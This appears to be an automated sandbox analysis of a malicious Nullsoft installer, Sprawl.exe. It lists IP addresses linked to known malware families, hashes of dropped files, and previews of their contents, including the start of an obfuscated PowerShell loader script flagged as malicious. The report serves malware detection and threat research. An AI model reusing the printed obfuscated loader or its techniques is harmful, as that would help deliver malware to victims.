                                                                                                                          Request for 30 Downpayment.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                          • 217.160.0.93
                                                                                                                          la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 212.227.138.124
                                                                                                                          yakuza.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 74.208.123.157
                                                                                                                          la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 217.160.111.108
                                                                                                                          Ageeconstruction -_(BENEFIT INSTRUCTIONS)_.docxGet hashmaliciousMamba2FABrowse
                                                                                                                          • 217.160.0.215
                                                                                                                          Ageeconstruction -_(BENEFIT INSTRUCTIONS)_.docxGet hashmaliciousMamba2FABrowse
                                                                                                                          • 217.160.0.215
                                                                                                                          EMnyl2klUV.elfGet hashmaliciousMiraiBrowse
                                                                                                                          • 217.160.45.92
                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          54328bd36c14bd82ddaa0c04b25ed9adRundholterne89.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                          • 188.114.97.3
                                                                                                                          SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 188.114.97.3
                                                                                                                          Swift Detail 103.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 188.114.97.3
                                                                                                                          FACTURA-ALBARANES.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                          • 188.114.97.3
                                                                                                                          New Purchase_Order_110511.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 188.114.97.3
                                                                                                                          7vbu8ZW8lFI8mn5.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 188.114.97.3
                                                                                                                          z547GEViTFyfCZdLZP.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                          • 188.114.97.3
                                                                                                                          SecuriteInfo.com.Trojan.PackedNET.3057.16994.22226.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                          • 188.114.97.3
                                                                                                                          TicariXHesapXXzetiniz.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                          • 188.114.97.3
                                                                                                                          REVISED PROFORMA INVOICE STVC007934196.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 188.114.97.3
                                                                                                                          3b5074b1b5d032e5620f69f9f700ff0eRundholterne89.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          Swift Detail 103.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          6 654398.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          FACTURA-ALBARANES.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          Massageapparater.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          FZCO - PO#12345.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          New Purchase_Order_110511.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          7vbu8ZW8lFI8mn5.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          Ref#150689.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          37f463bf4616ecd445d4a1937da06e19Rundholterne89.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                          • 142.250.184.238
                                                                                                                          • 142.250.185.65
                                                                                                                          Justificante.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                          • 142.250.184.238
                                                                                                                          • 142.250.185.65
                                                                                                                          6 654398.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                          • 142.250.184.238
                                                                                                                          • 142.250.185.65
                                                                                                                          FACTURA-ALBARANES.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                          • 142.250.184.238
                                                                                                                          • 142.250.185.65
                                                                                                                          Massageapparater.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                          • 142.250.184.238
                                                                                                                          • 142.250.185.65
                                                                                                                          phc.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 142.250.184.238
                                                                                                                          • 142.250.185.65
                                                                                                                          phc.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 142.250.184.238
                                                                                                                          • 142.250.185.65
                                                                                                                          001_215_EA2047939_202410210815.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                          • 142.250.184.238
                                                                                                                          • 142.250.185.65
                                                                                                                          Fignen234.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                          • 142.250.184.238
                                                                                                                          • 142.250.185.65
                                                                                                                          Fignen234.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                          • 142.250.184.238
                                                                                                                          • 142.250.185.65
                                                                                                                          No context
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):14744
                                                                                                                          Entropy (8bit):4.992175361088568
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
                                                                                                                          MD5:A35685B2B980F4BD3C6FD278EA661412
                                                                                                                          SHA1:59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
                                                                                                                          SHA-256:3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
                                                                                                                          SHA-512:70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
                                                                                                                          Malicious:false
                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                          Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Reputation:high, very likely benign file
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):880264
                                                                                                                          Entropy (8bit):7.715640679390863
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:l9/IyjazmRR+BZhOLlpJjdCPwwdw6ETeVlCE7vkQymGwSW01hXqvjoaCi7lnsZzz:/A/KqZhOnJdyzp+alCJmvulW6Nd0vo
                                                                                                                          MD5:47FD98348B7D314E4E9DAE46E5F1E1A1
                                                                                                                          SHA1:CAFE48404707E61235BFBE6646D8072AF4298E21
                                                                                                                          SHA-256:125B4582B7DD2221044FB257F580DA57E4DC61B03A6C35E208FED973F71C28A1
                                                                                                                          SHA-512:8A1DEDA7D7E8E80D8B2E62AD0D9D4400B1D865EA322955E577FC439A8A0F1D6D3CB912397ECB6458941FD7FD566C1FDBDF4C4ED02C72234FA543BFCB45DB845A
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F..v...F...@...F.Rich..F.........................PE..L....{.W.................`...|.......1.......p....@.......................................@.................................4u....... ..X............................................................................p...............................text...._.......`.................. ..`.rdata..R....p.......d..............@..@.data....T...........x..............@....ndata...0...............................rsrc...X.... .......~..............@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):26
                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                          Malicious:true
                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                          Process:C:\Users\user\Desktop\Sprawl.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x512, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):15845
                                                                                                                          Entropy (8bit):7.693658939604953
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:dnSPb8riksvdEh0qrjVqIPrLgrpNQMUBWud20p:dnUwriksvMjrZqo3Up9U8ud20p
                                                                                                                          MD5:762778DFE1B62D3430B44A32AEDC03E0
                                                                                                                          SHA1:7317D9579F9F4C4BEF82BE64FB3DFFB63160EEC5
                                                                                                                          SHA-256:9A602EBAFC1F46AAD7248F6DA82938CE382DE9FFBC6C472BD4848D4519CA67A8
                                                                                                                          SHA-512:B39A8F6DC07F3A4CFE3CF5E1563543ECE2864FECED28282356FA64D7D0B50FA43B70F57FC8A2C4424A553E14E6BE526293D90F56C63994EC79F5520488EE0CCF
                                                                                                                          Malicious:false
                                                                                                                          Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..IE..'...Ph.....(....(...)(...(....(...J`.QI@.(....(.....(....(....)(...).f..(.......Q@.%.P.IE..RQE...Q@..).RQE...Q@.%.P.IE...%.P.IE..RQE.mQE..bQE..QE%..QE......QE%..QE.......QI@..Q@.%.P.IE..RQE..QI@..RP.E.....RS.i(...%.P.IE%.-%.P.IE..RQE...Q@..).RQE...Q@.%.P0....J(...-%.P.IE...IE..aE...QE..QE%..QE.%.Q@...S...J..QI@.IE..RQE...Q@..RP.E...QE%0.(...%...-%...QE..RQE...Q@.%.P0
                                                                                                                          Process:C:\Users\user\Desktop\Sprawl.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):91155
                                                                                                                          Entropy (8bit):3.2484639775571122
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:sx0eYUpSjZTH4Refp/ZwLfKCGhiKveAC4LjJNV8RHwnx/F0H0jbPYER9RLXLxFJi:8UhyD9meQZFRRbLXdDRseVQq4
                                                                                                                          MD5:55DD84338306B8F361571D07E3D03F25
                                                                                                                          SHA1:5F086147B0ED6D4CBE40B6F81C1003EB07714B94
                                                                                                                          SHA-256:016DE5BD5CEBA70CD0041265F69BE3BB6FF54D3DCA19340ED44DC15317066E45
                                                                                                                          SHA-512:045E39931094C1D423D69C4BEF750CACF56E0DEF562162211F51F1B5E0C3E265ACEDE7FC06979CFCE68762A99180317419685E5542D3E44882B11116D1EE7FE8
                                                                                                                          Malicious:false
                                                                                                                          Preview:....7.................3.........}.......Q.....................~........y.........u...4...bp..o......z.......................................................k.............Tg.....`..Q.........<........A........f.....X..."..............^.........@....|..........................h....X..................1.......zh...........3..>..)...Y....:.................GG.....+F#...z.~.....!....................:..............(.................Y....7.......5..^..{.......D...`................O..............z#..............4$...a..............o....................c..s.......=......^..~..................................B....o.......................................l:...........*Y..i.".C..i............_.........).....-...............|P.......b......h....~.....w+....................-....1.......<...6.........b.".@...................1...P....s..h9.......l........H..................k...e........<.......f...;...............m....W...........h.g.%...........-........."..................S......F.....e........
                                                                                                                          Process:C:\Users\user\Desktop\Sprawl.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):411197
                                                                                                                          Entropy (8bit):3.2412073600303604
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:QuopzWTN5dkmo9X81LoYHLr0FJfFYcRQOD:KkxkfDEC
                                                                                                                          MD5:9548F6F7A71852794789DE0AC5FDE451
                                                                                                                          SHA1:74C915E2C9C110929FD87C907BE17930B0B66B24
                                                                                                                          SHA-256:2D3371072047972236B2BAD7280E34BA1FD041C99CD132BC0E1DD767D0AFC471
                                                                                                                          SHA-512:0468FCA29C3F916CBC0B3B132EA24BB582ED0F0D4921523F5DF6EE17F76709437D25324E08AF3C43FCAE8BD1B9F388E49B64ED3C8464062E7D099B0D6B9BC5DE
                                                                                                                          Malicious:false
                                                                                                                          Preview:....u*...........................*................................#.k4..`.......K....................7F#.....-....................Z.........v.................#.............p...<.....5.j...........p....j....... 4.....h................q.2.......C..................................,.............\........#..................e..........b.........................o..8.e........'.Q......<..........e.x...8......=.......}.....QU......E.....O............................6....^.y.....~........i..........................Q..`.>...........m..........,................6/..._..f....\.........`.y.............................6...............2[........................)..........................<....7......6..................8.....................................b...........................3.....U.......N.........k8.x.........................)~..............o.....+.............6............Y.>....................e.J....S...t..........K........................P\.............r...................... ............
                                                                                                                          Process:C:\Users\user\Desktop\Sprawl.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):326869
                                                                                                                          Entropy (8bit):7.638472515962235
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:fINELrIDzZfkJ4/LmVIO6SSWngwET88GaD5pQq5ICM+byHGEQX6l9bQu2eM:wGLEBMJ4/L933W1yGaDAqCCMgWGxgM
                                                                                                                          MD5:0333FB2B0E19A85944C9EA2538F15529
                                                                                                                          SHA1:CB7CF6AEF6B3409205B0EFA337EB5FC4F84FA237
                                                                                                                          SHA-256:3529AB40264CB6806CB5ED7E64D98D29B94362987720CD633E4785F41E0163E2
                                                                                                                          SHA-512:5FA5102E95FB393E47FEA92D7CEE9B0F66BFAA94EC0CACE06A83BD18413EB9D7968E6973A8843AEB7F9B877418A11E3686F61D326569392AE3E6CB65CC51EA5E
                                                                                                                          Malicious:false
                                                                                                                          Preview:.................!!....i..&&&&&&..............?..........A...............................n..8...NN.zz........((.pppppp.z.....N................hh.....AA........%........<<<.......E.%............GGG......}}}.......```....U...........`...............NNN.................ZZZ.....................................v...........................I....ZZ...^....CCC..........__.................................... ......99...............n..........k...]..CCC...`..~.....+...B..hhh....................++......{{....lll.))..X.B...||||.{.::.......ssss......3.Q........^...=.........G...........}.nnnn.))).........C...................-.1.....................000......##.333.........OO.i....k.........,..........5.??...kk.........I...;;;...............SS.....q.........*.............^......q.Q..................f...........`................{{.......k..".............................................................&&....d..........44...??..bbbbb......./.......22...((.........iiiiiiii........................:........
                                                                                                                          Process:C:\Users\user\Desktop\Sprawl.exe
                                                                                                                          File Type:ASCII text, with very long lines (3041), with CRLF, LF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):55184
                                                                                                                          Entropy (8bit):5.361768606025368
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:qBW8/PWnOQz17PFJoL9Wt34bzGFC3fm5Xa5Z9YwsklLt7:qj/PWnOa7NG9034fGQ3fmFTI7
                                                                                                                          MD5:6F2C225FF02A35F64C6157286F9E90B1
                                                                                                                          SHA1:FDFB286088FD3CB3C3FA39F39E2E7BA48B3C6624
                                                                                                                          SHA-256:0F4CAA809A6B9AD70A305958AF34E60B82F3080BBB7067F316CA85702FFBA443
                                                                                                                          SHA-512:C5FB4EAFB4C29B774648BCEC26736AD0808815D10618C95B723DE9296240E6F9CBC35E90CC4439266F013810F16DDE0F44A840FA928D8BE2A8562CC5AC8D2EB5
                                                                                                                          Malicious:true
                                                                                                                          Preview:$Transl=$Retiraden;..<#Crosswalk Spgelseshistorien Podagry Reje Pithoi Nglestillingen #>..<#Skadeslsholdelse checkkonti Afmatningens Crampet #>..<#Knbeskytternes Pontonbro Glassed Stikprvestandardafvigelsens Estells Toying #>..<#Svangerskabets Vejbygnings Nonrelated Anorthophyre #>..<#Brandlov bidrag Cotwinned Thyrostracan Natronens Positivitets #>..<#Perigeum smykk Flimsiest Pawnshops beskuet Tilsynsassistenten Diddles #>...$Hypoazoturia = @'. Befo. ravs$snowiUDebitnRevoll LosnaVersayD sassKheth=Byg,i$unineU R dinUd vedForlae Ichurpresuv ,truiKovsvsRelatnVivreiSenatnRoveng,udorsStraavAb rrere atjIndmalUforseAntr,d DingnaabneiLam nnSysteg Over;Subor.UnarifU,unsu RevonMordacPennet erbyiS cceoAfficnNyrer DecoSB,lageK ssepRemi,aExcerr WittaE brytUdelaiAdgano Cor.n forse tobyrJ.spenTegneeRundesBantu2Chyt 0Burgu7Green Cross( N,rs$ Ss nTSkorzyOmninl everv AriotPetiteInterrfordgeSericdInfileV,skerNorma,Elect$ Teles G ttv compitabskpastrossteppeTol unSignod ,kine Attrs Soni)Tbr d Estre{Ldrik.
                                                                                                                          Process:C:\Users\user\Desktop\Sprawl.exe
                                                                                                                          File Type:ASCII text, with very long lines (360), with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):362
                                                                                                                          Entropy (8bit):4.295609901239941
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:OV0mI/AA3CU6sDq6ry0bxmAOvFz0/TWEMsesxM7JXZO:OVcAV6yw3Ovx0/q3shK7Js
                                                                                                                          MD5:A47DE65B255D62E154E75208730B37D2
                                                                                                                          SHA1:9AD95C489EABDBCD12C02CD312C85D0C73A565F7
                                                                                                                          SHA-256:1527C27BE377FB2EFDB75E64EF88FEE6B879712DEC1AE6E8CCA4E66188099784
                                                                                                                          SHA-512:206FB780CA6A6BEA7B1DA2AAD8D1E8C38331AE5A03CC82FC181A6E13234DC4523033AA775A3F15C261FEC74910ECAF622ABAC99444E8DAA8B63EC35379FBE29A
                                                                                                                          Malicious:false
                                                                                                                          Preview:beboere sletteprogrammerne afbrndtes untruthfulness,methanolysis blokniveauets tegnbaseret keisar arbejdsmndene rger,lsenets quindecimvir complexify hundevagten cymblernes.cressier immediate batchkrslerne antisepalous cryptonymic pings,pampination spytkirtlen vandranunkel stormmaage,diversificer udtalendes attributgrammatiks snedkeris sati frailejon rvturene..
                                                                                                                          Process:C:\Users\user\Desktop\Sprawl.exe
                                                                                                                          File Type:GTA audio index data (SDT)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):339224
                                                                                                                          Entropy (8bit):3.2329059465811363
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:TlwUufGWwltoSeWq5Xck5tiy5ScV95Cca+8aB5p0jsDytfuWoaP/ZTf:x3W045X/5tiyB8faB5p4sD22uN
                                                                                                                          MD5:2AFAF6367CF5833A8885999FEFA5B44A
                                                                                                                          SHA1:58EDFAC56FD3BDA98CAD7F2A784F58CF0CCCA5A9
                                                                                                                          SHA-256:66D0440913A064549BF52DD102475A422A55A0A1A99A38C0445CCF84EB98C074
                                                                                                                          SHA-512:A769F552CD91CE7163FE25C6E785D3A225979A9E50805F031C05E52CF5F82FB1E582FE621C947C7B0709F9E627C6CF318CF899CA97CC2BC4A3D934B94C2279A4
                                                                                                                          Malicious:false
                                                                                                                          Preview:........5M.....]...................[8...........t...........j.kKk.............Y.3.-.........u.....'.......<..............0..............-.....m....q.%.........S....F......6.............M.C.z.........m.|..............m...].-..<.......0.............o......QL....x....... ..........p.........?.'.a........:.........K............................#............Z).......$......................................9......................_u...1...S>............................c....K\......l.......z............%..(..........8...........z.........\....$......._.g...........v.....{R..............;.............R........1........:...Q...........W..W....................................F .....-...b..F........G...,CH......}...D....b...........9...8...q......Y....R..............................................<..............=...~................. ...........u.......T...B..............i............`....r...........R..............1.2........................../....#.......b.............;...............-..+
                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                          Entropy (8bit):7.715640679390863
                                                                                                                          TrID:
                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                          File name:Sprawl.exe
                                                                                                                          File size:880'264 bytes
                                                                                                                          MD5:47fd98348b7d314e4e9dae46e5f1e1a1
                                                                                                                          SHA1:cafe48404707e61235bfbe6646d8072af4298e21
